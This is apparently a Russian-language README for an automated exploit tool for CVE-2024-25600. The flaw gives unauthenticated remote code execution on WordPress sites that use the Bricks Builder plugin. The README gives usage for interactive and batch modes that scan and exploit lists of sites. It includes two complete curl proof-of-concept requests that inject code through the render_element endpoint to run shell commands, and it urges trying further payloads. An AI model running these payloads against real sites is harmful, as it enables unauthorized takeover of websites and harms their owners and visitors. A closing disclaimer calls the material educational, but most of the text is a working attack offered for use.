
Автоматизированный инструмент эксплойта для CVE-2024-25600, позволяющий неаутентифицированное удаленное выполнение кода на сайтах WordPress с использованием плагина Bricks Builder. Поддерживает интерактивный и пакетный режимы для выполнения команд.
Этот инструмент 🛠️ предназначен для эксплуатации уязвимости CVE-2024-25600 🕳️, обнаруженной в плагине Bricks Builder для WordPress. Уязвимость позволяет неавторизованное удалённое выполнение кода на затронутых веб-сайтах 💻. Инструмент автоматизирует процесс эксплуатации, получая nonce-значения и отправляя специально сформированные запросы для выполнения произвольных команд.
git clone.pip install -r requirements.txt.python exploit.py -u <URL>, чтобы начать интерактивный режим.python exploit.py -l <file_path>, чтобы просканировать и эксплуатировать указанные сайты.Базовый PoC, предоставленный в раскрытии, выглядит следующим образом:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
Обновление: второй PoC (более надёжный)
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "carousel",
"settings": {
"type": "posts",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
Возможно, дополнительные полезные нагрузки дадут лучшие результаты. Если мой эксплойт или PoC не работает для вас, рекомендую поэкспериментировать с альтернативными полезными нагрузками, чтобы найти более эффективное решение.
Замените [HOST] на целевой веб-сайт, а [NONCE] — на значение nonce, полученное с сайта.
Для получения дополнительной информации об уязвимости CVE-2024-25600 обратитесь к подробному раскрытию на Snicco.io.
Информация, представленная в этом README, предназначена только для образовательных целей. Несанкционированный взлом веб-сайтов или сетей является незаконным и неэтичным. 🚫
Благодарим исследователей безопасности, которые обнаружили и сообщили об этой уязвимости, предоставив сообществу информацию и инструменты для защиты веб-приложений.